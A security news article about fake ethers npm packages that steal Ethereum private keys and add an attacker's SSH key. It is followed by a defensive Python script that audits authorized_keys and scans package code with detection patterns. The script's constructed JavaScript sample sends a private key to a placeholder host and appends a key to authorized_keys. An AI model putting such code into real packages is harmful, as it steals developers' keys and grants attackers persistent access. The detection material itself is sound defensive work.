Malicious npm Packages Target Ethereum Wallets with SSH Backdoor

SeniorTechInfo

Cybersecurity researchers have uncovered suspicious packages on the npm registry designed to steal Ethereum private keys and gain remote access via SSH.

According to Phylum, the packages attempt to gain SSH access by appending the attacker's public key to the authorized_keys file on the victim's machine.

The list of fake ethers packages involved in this campaign includes:

Some of these packages, mostly published by accounts like “crstianokavic” and “timyorks,” seem to be for testing purposes. The most advanced package in the list is ethers-mew.

In a similar incident from August 2023, Phylum exposed a package called ethereum-cryptographyy that stole private keys using a malicious dependency.

This new attack campaign embeds malicious code directly into the packages, allowing threat actors to extract Ethereum private keys to a domain under their control.

Unlike previous attacks that were triggered upon installing the package, this campaign requires developers to use the package’s functionality in their code, making it more deceptive.

The ethers-mew package can even modify the authorized_keys file to grant attackers persistent access to compromised hosts.
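The two behaviours described above, persistence through ~/.ssh/authorized_keys and exfiltration of a private key when the package's own functions are called, are both things a defender can check for on a developer workstation. The following script is an added example, not Phylum's tooling or anything from the ethers-mew package: it audits an authorized_keys file against the set of key blobs you actually issued (reporting the OpenSSH-style SHA256 fingerprint of anything else), and runs a simple heuristic scan over installed package source for lines that touch the SSH authorized_keys path or send a secret-looking value over the network. The authorized_keys content, the issued-key set and the JavaScript snippet are all constructed samples; the key blobs are valid base64 but not real keys.

```python
"""Defensive checks for the behaviours reported in the ethers-mew campaign:
unexpected entries in ~/.ssh/authorized_keys and npm package code that
references that file or ships a private key off-host."""
import base64
import hashlib
import re
import shlex
from dataclasses import dataclass
from pathlib import Path

# Key types OpenSSH accepts in authorized_keys (the common subset).
KEY_TYPES = {
    "ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
    "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com",
    "sk-ecdsa-sha2-nistp256@openssh.com",
}


@dataclass(frozen=True)
class AuthorizedKey:
    lineno: int
    options: str   # option field with shell quoting stripped, "" if none
    key_type: str
    blob: str      # base64 key blob as written in the file
    comment: str

    @property
    def fingerprint(self) -> str:
        # Same format as `ssh-keygen -lf`: SHA256 of the decoded blob, base64, no padding.
        digest = hashlib.sha256(base64.b64decode(self.blob)).digest()
        return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list[AuthorizedKey]:
    """Parse authorized_keys lines: [options] key-type base64-blob [comment]."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)  # keeps command="..." options as one token
        idx = next((i for i, t in enumerate(tokens) if t in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(tokens):
            # Malformed line: surface it instead of silently skipping it.
            entries.append(AuthorizedKey(lineno, "", "<unparsed>", "", line))
            continue
        entries.append(AuthorizedKey(
            lineno, " ".join(tokens[:idx]), tokens[idx], tokens[idx + 1],
            " ".join(tokens[idx + 2:])))
    return entries


def audit_authorized_keys(text: str, issued_blobs: set[str]) -> list[AuthorizedKey]:
    """Return every entry whose key blob is not in the set of keys you issued."""
    return [e for e in parse_authorized_keys(text) if e.blob not in issued_blobs]


# Heuristics for package source. Noisy by design: a hit is a reason to read the code.
SSH_PERSISTENCE = re.compile(r"authorized_keys|[/\\]\.ssh[/\\]?")
NETWORK_CALL = re.compile(r"\bfetch\s*\(|\bhttps?\.request\s*\(|\baxios\b|XMLHttpRequest|\bnet\.connect\s*\(")
SECRET_NAME = re.compile(r"privateKey|private_key|mnemonic|seedPhrase", re.IGNORECASE)


def scan_package_source(source: str) -> list[tuple[int, str]]:
    """Flag lines that touch the SSH key file or put a secret on the wire."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if SSH_PERSISTENCE.search(line):
            hits.append((lineno, "references ~/.ssh/authorized_keys"))
        if NETWORK_CALL.search(line) and SECRET_NAME.search(line):
            hits.append((lineno, "sends a secret-looking value over the network"))
    return hits


def scan_node_modules(root: Path) -> dict[str, list[tuple[int, str]]]:
    """Run scan_package_source over every .js file under a node_modules tree."""
    findings = {}
    for js in root.rglob("*.js"):
        try:
            hits = scan_package_source(js.read_text(errors="replace"))
        except OSError:
            continue
        if hits:
            findings[str(js.relative_to(root))] = hits
    return findings


def _blob(label: str) -> str:
    # Constructed stand-in for a key blob: valid base64, not a real key.
    return base64.b64encode(label.encode()).decode()


# Constructed sample: two keys the ops team issued, one that nobody did.
ISSUED_BLOBS = {_blob("ops-laptop-ed25519"), _blob("nas-backup-rsa")}
SAMPLE_AUTHORIZED_KEYS = f"""\
# keys issued by the ops team
ssh-ed25519 {_blob("ops-laptop-ed25519")} ops@laptop
restrict,command="/usr/bin/backup --full" ssh-rsa {_blob("nas-backup-rsa")} backup@nas
ssh-ed25519 {_blob("never-issued")}
"""

# Constructed sample of a package function that only misbehaves when called
# (hypothetical names; collector.example.invalid is a placeholder domain).
SAMPLE_PACKAGE_SOURCE = """\
const fs = require('fs');
const os = require('os');
function signTransaction(tx, privateKey) {
  fetch('https://collector.example.invalid/k', { method: 'POST', body: privateKey });
  fs.appendFileSync(os.homedir() + '/.ssh/authorized_keys', INJECTED_PUBKEY + '\\n');
  return realSign(tx, privateKey);
}
"""

if __name__ == "__main__":
    for e in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, ISSUED_BLOBS):
        print(f"authorized_keys line {e.lineno}: unexpected {e.key_type} key "
              f"{e.fingerprint} comment={e.comment!r}")
    for lineno, reason in scan_package_source(SAMPLE_PACKAGE_SOURCE):
        print(f"package source line {lineno}: {reason}")
```

On a real host, replace the constructed samples with `Path("~/.ssh/authorized_keys").expanduser().read_text()` and `scan_node_modules(Path("node_modules"))`. The key audit is the reliable half: an allowlist of issued blobs has no false positives, and an unknown entry is worth treating as an incident. The source scan is a triage aid only; because the reported campaign triggers on use rather than on install, checking `postinstall` scripts alone would have missed it, which is why the scan looks at the package's regular code paths.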

All of the packages and their author accounts were removed shortly after publication, Phylum noted.
